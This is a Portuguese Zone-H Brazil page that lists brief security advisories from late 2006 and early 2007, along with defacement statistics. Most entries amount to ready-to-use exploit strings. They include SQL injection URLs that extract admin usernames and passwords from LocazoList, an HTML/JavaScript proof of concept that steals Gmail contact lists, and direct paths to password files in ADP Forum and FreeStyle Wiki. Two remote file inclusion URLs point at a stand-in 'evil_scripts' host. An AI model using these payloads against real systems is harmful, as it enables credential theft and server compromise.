Zone-H
Home arrow Avisos de Segurança
05 de julho de 2009
 
 
Ataques desta semana
O.S.  Defs.  %
Win 2003  4243  46.12%
Linux  3965  43.10%
Win 2000  486  5.28%
FreeBSD  208  2.26%
Win 2008  112  1.22%
Other  185  2.01%

Total de ataques: 9199 dos quais 3045 único(s) no ip e 6154 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Avisos de Segurança
LocazoList: Injeção de Códigos SQL Imprimir E-mail
Avaliação do Usuário: / 1
Por Raphael Martins (Ashiyakuza)   
03 de janeiro de 2007
Nome do Script: LocazoList
Site do script: http://www.locazo.net:81
Versão Afetada: 2.01a beta e anteriores

Encontrado por ajann
Email: ajannhwt [at] hotmail.com

Exploração:

http://[target]/[path]//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
http://[target]/[path]//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201
 
Lista de contatos do GMail vulnerável Imprimir E-mail
Avaliação do Usuário: / 7
Por Andre   
02 de janeiro de 2007
Simplesmente estando logado no GMail e visitando um Web site com um código malicioso, sua lista do contato pode ser roubada assim como todos seus detalhes. O problema ocorre porque o Google armazena os dados da lista de contatos em um arquivo Javascript.  O ataque foi testado nos browsers Firefox, Opera, IE6 e IE 7.

/---code---- 

<html>
<head>
<script>
function google(a) {
document.write("<ol>");
for (i = 0; i < a.Body.Contacts.length; i++) {
document.write("<li>" + a.Body.Contacts[i].Email + "</li>");
}
document.write("</ol>");
}
</script>
<script xsrc="http://docs.google.com/data/contacts?out=js&s how=ALL&psort=Affinity&callback=google&max=99999"> </script></head>
<body>
Hello
</body>
</html>

 ---/

Fonte: slashdot.org 

 
ADP Forum: Divulgação de Senha Imprimir E-mail
Avaliação do Usuário: / 1
Por Raphael Martins (Ashiyakuza)   
31 de dezembro de 2006
Nome do Script: ADP Forum
Site do script: www.linux.it/~fedro/
Versão Afetada: 2.0.3

Encontrado por Dr Max Virus
Email: drmaxvirus [at] w.cn

Exploração:

http:/[target]/[path]/users/admin.txt
 
FreeStyle Wiki: Divulgação de Senha Imprimir E-mail
Avaliação do Usuário: / 3
Por Raphael Martins (Ashiyakuza)   
30 de dezembro de 2006
Nome do Script: FreeStyle Wiki
Site do script: http://keihanna.dl.sourceforge.jp/fswiki/
Versão Afetada: 3.6.2 e anteriores

Encontrado por bd0rk
Email: bd0rk [at] hackermail.com

Exploração:

http://[target]/[fswiki_path]/config/user.dat
 
Enigma Coppermine Bridge: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
30 de dezembro de 2006
Nome do Script: Enigma Coppermine Bridge
Site do script: http://www.lunabyte.org
Versão Afetada: 2

Encontrado por xoron
Email: x0r0n [at] hotmail.com

Exploração:

/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?
 
Enigma WordPress Bridge: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
Por Raphael Martins (Ashiyakuza)   
30 de dezembro de 2006
Nome do Script: Enigma WordPress Bridge
Site do script: www.lunabyte.org
Versão Afetada: 2

Encontrado por xoron
Email: x0r0n [at] hotmail.com

Exploração:

WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://evil_scripts?
 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 10 Próximo > Fim >>

Resultados 79 - 104 de 236
 
Top! Top!